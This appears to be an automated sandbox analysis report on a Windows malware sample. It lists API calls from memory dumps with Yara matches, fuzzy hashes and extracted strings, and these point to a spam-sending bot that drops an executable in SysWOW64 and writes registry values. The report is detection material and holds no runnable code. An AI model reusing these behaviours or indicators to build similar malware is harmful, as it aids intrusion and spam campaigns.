                                                                                          • Part of subcall function 0040EBCC: GetProcessHeap.KERNEL32(00000000,00000000,80000001,0040EBFE,7FFF0001,?,0040DB55,7FFF0001), ref: 0040EBD3
                                                                                          • Part of subcall function 0040EBCC: HeapAlloc.KERNEL32(00000000,?,0040DB55,7FFF0001), ref: 0040EBDA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: htons$Heap$AllocCountProcessTicksendto
                                                                                        • String ID:
                                                                                        • API String ID: 1802437671-0
                                                                                        • Opcode ID: 6299894b8f3bc0cc0dfae645a3d09159b09bee40e3d6069153e68f679ff52250
                                                                                        • Instruction ID: e317574a351225f02cdc10e669db3389ba019fd1a924c3d0ab3f78f3d9a30560
                                                                                        • Opcode Fuzzy Hash: 6299894b8f3bc0cc0dfae645a3d09159b09bee40e3d6069153e68f679ff52250
                                                                                        • Instruction Fuzzy Hash: B8313A342483969FD7108F74DD80AA27760FF19318B19C07EE855DB3A2D6B6E892D718
                                                                                        APIs
                                                                                        • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000000,00000004), ref: 0040F2A0
                                                                                        • setsockopt.WS2_32(00000004,0000FFFF,00001005,00000004,00000004), ref: 0040F2C0
                                                                                        • setsockopt.WS2_32(00000004,0000FFFF,00001006,00000004,00000004), ref: 0040F2DD
                                                                                        • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0040F2EC
                                                                                        • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0040F2FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: setsockopt
                                                                                        • String ID:
                                                                                        • API String ID: 3981526788-0
                                                                                        • Opcode ID: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
                                                                                        • Instruction ID: 54276ff97121d9260d4f5268cf3942b14174050ddbce03adff589c8218e6c2bb
                                                                                        • Opcode Fuzzy Hash: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
                                                                                        • Instruction Fuzzy Hash: 6B110AB2A40248BAEF11DF94CD85FDE7FBCEB44751F008066BB04EA1D0E6B19A44CB94
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104,00000100,004122F8), ref: 0040915F
                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 00409166
                                                                                        • CharToOemA.USER32(?,?), ref: 00409174
                                                                                        • wsprintfA.USER32 ref: 004091A9
                                                                                          • Part of subcall function 00409064: GetTempPathA.KERNEL32(00000400,?,00000000,004122F8), ref: 0040907B
                                                                                          • Part of subcall function 00409064: wsprintfA.USER32 ref: 004090E9
                                                                                          • Part of subcall function 00409064: CreateFileA.KERNEL32(004122F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
                                                                                          • Part of subcall function 00409064: lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
                                                                                          • Part of subcall function 00409064: WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
                                                                                          • Part of subcall function 00409064: CloseHandle.KERNEL32(00000000), ref: 00409134
                                                                                        • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 004091E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 3857584221-0
                                                                                        • Opcode ID: 69a42f15c0bdb603acf61cfacf6d4b07552c73bbecf68ccfe74a45dc0564b67a
                                                                                        • Instruction ID: 6acb945c628b875356ea86accac8c7b18cb61426f44bb7d0566a1afba52fbd3a
                                                                                        • Opcode Fuzzy Hash: 69a42f15c0bdb603acf61cfacf6d4b07552c73bbecf68ccfe74a45dc0564b67a
                                                                                        • Instruction Fuzzy Hash: 8F016DB69001187BD720A7619D49EDF3A7C9B85705F0000A6BB09E2080DAB89AC48F68
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 02D793C6
                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 02D793CD
                                                                                        • CharToOemA.USER32(?,?), ref: 02D793DB
                                                                                        • wsprintfA.USER32 ref: 02D79410
                                                                                          • Part of subcall function 02D792CB: GetTempPathA.KERNEL32(00000400,?), ref: 02D792E2
                                                                                          • Part of subcall function 02D792CB: wsprintfA.USER32 ref: 02D79350
                                                                                          • Part of subcall function 02D792CB: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 02D79375
                                                                                          • Part of subcall function 02D792CB: lstrlen.KERNEL32(?,?,00000000), ref: 02D79389
                                                                                          • Part of subcall function 02D792CB: WriteFile.KERNEL32(00000000,?,00000000), ref: 02D79394
                                                                                          • Part of subcall function 02D792CB: CloseHandle.KERNEL32(00000000), ref: 02D7939B
                                                                                        • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02D79448
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 3857584221-0
                                                                                        • Opcode ID: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
                                                                                        • Instruction ID: 82f217a62fd36752c9e311caf93bc6f8670303bb2cde4d2cae48e43b06e8d321
                                                                                        • Opcode Fuzzy Hash: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
                                                                                        • Instruction Fuzzy Hash: 98015EF69001587BDB21A7619D8DEDF3B7CDB95701F0040A2BB49E2180EAB89AC5CF75
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(?,localcfg,?,00000000,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001), ref: 00402429
                                                                                        • lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 0040243E
                                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 00402452
                                                                                        • lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 00402467
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$lstrcmpi
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 1808961391-1857712256
                                                                                        • Opcode ID: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
                                                                                        • Instruction ID: 10b525c6ae3f8891cd48fd25e34f392daf9ed257baad57177c8ccf48abf1fcea
                                                                                        • Opcode Fuzzy Hash: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
                                                                                        • Instruction Fuzzy Hash: B4011A31600218EFCF11EF69DD888DE7BA9EF44354B01C436E859A7250E3B4EA408A98
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetAdaptersAddresses$Iphlpapi.dll
                                                                                        • API String ID: 2574300362-1087626847
                                                                                        • Opcode ID: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
                                                                                        • Instruction ID: f6c238f91e07a5798e813b0b618c72a9a5addbcd8e0b61e0281ff71d4ef1483f
                                                                                        • Opcode Fuzzy Hash: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
                                                                                        • Instruction Fuzzy Hash: 3D11DA71E01124BFCB11DBA5DD858EEBBB9EB44B10B144077E005F72A1E7786E80CB98
                                                                                        APIs
                                                                                          • Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                          • Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                        • GetComputerNameA.KERNEL32(?,0000000F), ref: 00401C15
                                                                                        • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 00401C51
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressComputerInformationLibraryLoadNameProcVolume
                                                                                        • String ID: hi_id$localcfg
                                                                                        • API String ID: 2777991786-2393279970
                                                                                        • Opcode ID: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
                                                                                        • Instruction ID: b3a67a5cb4ed68e183e77afdc8505cc80d304e276af6d439446d09174096bcc5
                                                                                        • Opcode Fuzzy Hash: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
                                                                                        • Instruction Fuzzy Hash: B2018072A44118BBEB10EAE8C8C59EFBABCAB48745F104476E602F3290D274DE4486A5
                                                                                        APIs
                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00406F0F
                                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,*p@), ref: 00406F24
                                                                                        • FreeSid.ADVAPI32(?), ref: 00406F3E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                        • String ID: *p@
                                                                                        • API String ID: 3429775523-2474123842
                                                                                        • Opcode ID: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
                                                                                        • Instruction ID: a55d58a6849641b9de595c9770ce5785232f8714219103e6702645194e06a02f
                                                                                        • Opcode Fuzzy Hash: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
                                                                                        • Instruction Fuzzy Hash: 6701E571904209AFDB10DFE4ED85AAE7BB8F708304F50847AE606E2191D7745A54CB18
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: gethostbynameinet_addr
                                                                                        • String ID: time_cfg$u6A
                                                                                        • API String ID: 1594361348-1940331995
                                                                                        • Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                        • Instruction ID: fe5b9b89d2109086e851b550031d38cfb47cf1f7d9648d636958c6bb5e2b542b
                                                                                        • Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                        • Instruction Fuzzy Hash: 79E08C306041518FCB008B28F888AC537A4AF0A330F048180F840C32A0D738DD80D640
APIs
• SetFileAttributesA.KERNEL32(?,00000080), ref: 02D769E5
• SetFileAttributesA.KERNEL32(?,00000002), ref: 02D76A26
• GetFileSize.KERNEL32(000000FF,00000000), ref: 02D76A3A
• CloseHandle.KERNEL32(000000FF), ref: 02D76BD8
  • Part of subcall function 02D7EE95: GetProcessHeap.KERNEL32(00000000,?,00000000,02D71DCF,?), ref: 02D7EEA8
  • Part of subcall function 02D7EE95: HeapFree.KERNEL32(00000000), ref: 02D7EEAF
Memory Dump Source
• Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
Yara matches
Similarity
• API ID: File$AttributesHeap$CloseFreeHandleProcessSize
• String ID:
• API String ID: 3384756699-0
APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: wsprintf
• String ID: %u.%u.%u.%u.%s$localcfg
• API String ID: 2111968516-120809033
APIs
• RegCreateKeyExA.ADVAPI32(80000001,0040E2A3,00000000,00000000,00000000,00020106,00000000,0040E2A3,00000000,000000E4), ref: 0040E0B2
• RegSetValueExA.ADVAPI32(0040E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,004122F8), ref: 0040E127
• RegDeleteValueA.ADVAPI32(0040E2A3,?,?,?,?,?,000000C8,004122F8), ref: 0040E158
• RegCloseKey.ADVAPI32(0040E2A3,?,?,?,?,000000C8,004122F8,?,?,?,?,?,?,?,?,0040E2A3), ref: 0040E161
Memory Dump Source
• Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Value$CloseCreateDelete
• String ID:
• API String ID: 2667537340-0
APIs
• RegCreateKeyExA.ADVAPI32(80000001,02D7E50A,00000000,00000000,00000000,00020106,00000000,02D7E50A,00000000,000000E4), ref: 02D7E319
• RegSetValueExA.ADVAPI32(02D7E50A,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,004122F8), ref: 02D7E38E
• RegDeleteValueA.ADVAPI32(02D7E50A,?,?,?,?,?,000000C8,004122F8), ref: 02D7E3BF
• RegCloseKey.ADVAPI32(02D7E50A,?,?,?,?,000000C8,004122F8,?,?,?,?,?,?,?,?,02D7E50A), ref: 02D7E3C8
Memory Dump Source
• Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
Yara matches
Similarity
• API ID: Value$CloseCreateDelete
• String ID:
• API String ID: 2667537340-0
APIs
• WriteFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403F44
• GetLastError.KERNEL32 ref: 00403F4E
• WaitForSingleObject.KERNEL32(00000004,?), ref: 00403F5F
• GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403F72
Memory Dump Source
• Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
• String ID:
• API String ID: 3373104450-0
APIs
• ReadFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403FB8
• GetLastError.KERNEL32 ref: 00403FC2
• WaitForSingleObject.KERNEL32(00000004,?), ref: 00403FD3
• GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403FE6
Memory Dump Source
• Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
• String ID:
• API String ID: 888215731-0
APIs
• ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02D7421F
• GetLastError.KERNEL32 ref: 02D74229
• WaitForSingleObject.KERNEL32(?,?), ref: 02D7423A
• GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D7424D
Memory Dump Source
• Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
Yara matches
Similarity
• API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
• String ID:
• API String ID: 888215731-0
APIs
• WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02D741AB
• GetLastError.KERNEL32 ref: 02D741B5
• WaitForSingleObject.KERNEL32(?,?), ref: 02D741C6
• GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D741D9
Memory Dump Source
• Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
Yara matches
Similarity
• API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
• String ID:
• API String ID: 3373104450-0
APIs
• lstrcmp.KERNEL32(?,80000009), ref: 02D7E066
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
Yara matches
Similarity
• API ID: lstrcmp
• String ID: A$ A$ A
• API String ID: 1534048567-1846390581
APIs
• GetTickCount.KERNEL32 ref: 0040A4D1
• GetTickCount.KERNEL32 ref: 0040A4E4
• Sleep.KERNEL32(00000000,?,0040C2E9,0040C4E0,00000000,localcfg,?,0040C4E0,00413588,00408810), ref: 0040A4F1
• InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA
Memory Dump Source
• Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: CountTick$ExchangeInterlockedSleep
• String ID:
• API String ID: 2207858713-0
APIs
• GetTickCount.KERNEL32 ref: 00404E9E
• GetTickCount.KERNEL32 ref: 00404EAD
• Sleep.KERNEL32(0000000A,?,00000001), ref: 00404EBA
• InterlockedExchange.KERNEL32(?,00000001), ref: 00404EC3
Memory Dump Source
• Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: CountTick$ExchangeInterlockedSleep
• String ID:
• API String ID: 2207858713-0
APIs
• GetTickCount.KERNEL32 ref: 00404BDD
• GetTickCount.KERNEL32 ref: 00404BEC
• Sleep.KERNEL32(00000000,?,?,?,00000004,004050F2), ref: 00404BF9
• InterlockedExchange.KERNEL32(-00000008,00000001), ref: 00404C02
Memory Dump Source
• Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: CountTick$ExchangeInterlockedSleep
• String ID:
• API String ID: 2207858713-0
APIs
• GetTickCount.KERNEL32 ref: 00403103
• GetTickCount.KERNEL32 ref: 0040310F
• Sleep.KERNEL32(00000000), ref: 0040311C
• InterlockedExchange.KERNEL32(?,00000001), ref: 00403128
Memory Dump Source
• Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: CountTick$ExchangeInterlockedSleep
• String ID:
• API String ID: 2207858713-0
APIs
• RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?), ref: 02D783C6
• RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?), ref: 02D78477
  • Part of subcall function 02D769C3: SetFileAttributesA.KERNEL32(?,00000080), ref: 02D769E5
  • Part of subcall function 02D769C3: SetFileAttributesA.KERNEL32(?,00000002), ref: 02D76A26
  • Part of subcall function 02D769C3: GetFileSize.KERNEL32(000000FF,00000000), ref: 02D76A3A
  • Part of subcall function 02D7EE95: GetProcessHeap.KERNEL32(00000000,?,00000000,02D71DCF,?), ref: 02D7EEA8
  • Part of subcall function 02D7EE95: HeapFree.KERNEL32(00000000), ref: 02D7EEAF
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
Yara matches
Similarity
• API ID: File$AttributesHeap$CloseFreeOpenProcessSize
• String ID: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe
• API String ID: 359188348-2650950432
APIs
• GetLocalTime.KERNEL32(?), ref: 02D7AFFF
• SystemTimeToFileTime.KERNEL32(?,?), ref: 02D7B00D
  • Part of subcall function 02D7AF6F: gethostname.WS2_32(?,00000080), ref: 02D7AF83
  • Part of subcall function 02D7AF6F: lstrcpy.KERNEL32(?,00410B90), ref: 02D7AFE6
  • Part of subcall function 02D7331C: gethostname.WS2_32(?,00000080), ref: 02D7333F
  • Part of subcall function 02D7331C: gethostbyname.WS2_32(?), ref: 02D73349
  • Part of subcall function 02D7AA0A: inet_ntoa.WS2_32(00000000), ref: 02D7AA10
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
Yara matches
Similarity
• API ID: Time$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
• String ID: %OUTLOOK_BND_
• API String ID: 1981676241-3684217054
                                                                                        • Opcode ID: 8e8a8b671ed14d1768aa81df58b4956713f73d3ffbf43b844f6b98d3c95244e6
                                                                                        • Instruction ID: aee4a52c34e354838655bef00f003ae85a29a052331015432de68c2314d5b28c
                                                                                        • Opcode Fuzzy Hash: 8e8a8b671ed14d1768aa81df58b4956713f73d3ffbf43b844f6b98d3c95244e6
                                                                                        • Instruction Fuzzy Hash: FB41127290020CAFDB25EFA0DC45EEE3BADFF04304F24441AF92592251EA79DA548F64
                                                                                        APIs
                                                                                        • ShellExecuteA.SHELL32(00000000,00000000,00000020,00000022,00000000,00000000), ref: 02D79536
                                                                                        • Sleep.KERNEL32(000001F4), ref: 02D7955D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExecuteShellSleep
                                                                                        • String ID:
                                                                                        • API String ID: 4194306370-3916222277
                                                                                        • Opcode ID: 441ad30f2646d1b8623b46c1d7e45f404d08a6258c9d37c2b51fbe89c32dcb37
                                                                                        • Instruction ID: d7f1449f0e2bd6c081e112542f39ed28010d7ebb7dc75819dd5bc2c6d9a3b0cc
                                                                                        • Opcode Fuzzy Hash: 441ad30f2646d1b8623b46c1d7e45f404d08a6258c9d37c2b51fbe89c32dcb37
                                                                                        • Instruction Fuzzy Hash: 464109B38083A46EEB368B78D8AD7E67BE59B02318F1801E5D482573A2F77C4D81C711
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(00409A60,?,?,00000000,00000000,00409A60,?,00000000), ref: 004069F9
                                                                                        • WriteFile.KERNEL32(00409A60,?,00409A60,00000000,00000000), ref: 00406A27
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileWrite
                                                                                        • String ID: ,k@
                                                                                        • API String ID: 3934441357-1053005162
                                                                                        • Opcode ID: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
                                                                                        • Instruction ID: 2e4882fff751b5905bcc38bfa2cd4d67bf9c642b42fdf425c00f27fbfd993b21
                                                                                        • Opcode Fuzzy Hash: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
                                                                                        • Instruction Fuzzy Hash: 3A313A72A00209EFDB24DF58D984BAA77F4EB44315F12847AE802F7680D374EE64CB65
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 02D7B9D9
                                                                                        • InterlockedIncrement.KERNEL32(00413648), ref: 02D7BA3A
                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 02D7BA94
                                                                                        • GetTickCount.KERNEL32 ref: 02D7BB79
                                                                                        • GetTickCount.KERNEL32 ref: 02D7BB99
                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 02D7BE15
                                                                                        • closesocket.WS2_32(00000000), ref: 02D7BEB4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountIncrementInterlockedTick$closesocket
                                                                                        • String ID: %FROM_EMAIL
                                                                                        • API String ID: 1869671989-2903620461
                                                                                        • Opcode ID: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
                                                                                        • Instruction ID: d273ee52ec87788dd0bf24692212b57e5655dd124567419033c9e9e8e033c3db
                                                                                        • Opcode Fuzzy Hash: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
                                                                                        • Instruction Fuzzy Hash: C0315C71504248DFDF25DFA4DC84AEDB7A9EB48705F20405AFA25822A0FB79DA85CF14
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 536389180-1857712256
                                                                                        • Opcode ID: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                        • Instruction ID: 1ef816322ecc1e041cdf399b9b138f6358d408137adc4a714cdb07e14db9ba06
                                                                                        • Opcode Fuzzy Hash: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                        • Instruction Fuzzy Hash: 0821C631610115AFCB109F64DE8169ABBB9EF20311B25427FD881F72D1DF38E940875C
                                                                                        APIs
                                                                                        Strings
                                                                                        • Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl, xrefs: 0040C057
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTickwsprintf
                                                                                        • String ID: Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl
                                                                                        • API String ID: 2424974917-1012700906
                                                                                        • Opcode ID: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                        • Instruction ID: 59a0723085258e1b6130595cff45262f63c8180c8ffe05f2a9b9c441a6a96c57
                                                                                        • Opcode Fuzzy Hash: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                        • Instruction Fuzzy Hash: 53115672200100FFDB529BA9DD44E567FA6FB88319B3491ACF6188A166D633D863EB50
                                                                                        APIs
                                                                                          • Part of subcall function 004030FA: GetTickCount.KERNEL32 ref: 00403103
                                                                                          • Part of subcall function 004030FA: InterlockedExchange.KERNEL32(?,00000001), ref: 00403128
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00403929
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00403939
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CurrentThread$CountExchangeInterlockedTick
                                                                                        • String ID: %FROM_EMAIL
                                                                                        • API String ID: 3716169038-2903620461
                                                                                        • Opcode ID: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
                                                                                        • Instruction ID: b7f4056d5a805f6dc72f55654bcd4db07a73235d6c8b9c95532e416c15eafef7
                                                                                        • Opcode Fuzzy Hash: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
                                                                                        • Instruction Fuzzy Hash: 7B113DB5900214EFD720DF16D581A5DF7F8FB05716F11856EE844A7291C7B8AB80CFA8
                                                                                        APIs
                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 02D770BC
                                                                                        • LookupAccountNameW.ADVAPI32(00000000,?,?,00000104,?,?,?), ref: 02D770F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Name$AccountLookupUser
                                                                                        • String ID: |
                                                                                        • API String ID: 2370142434-2343686810
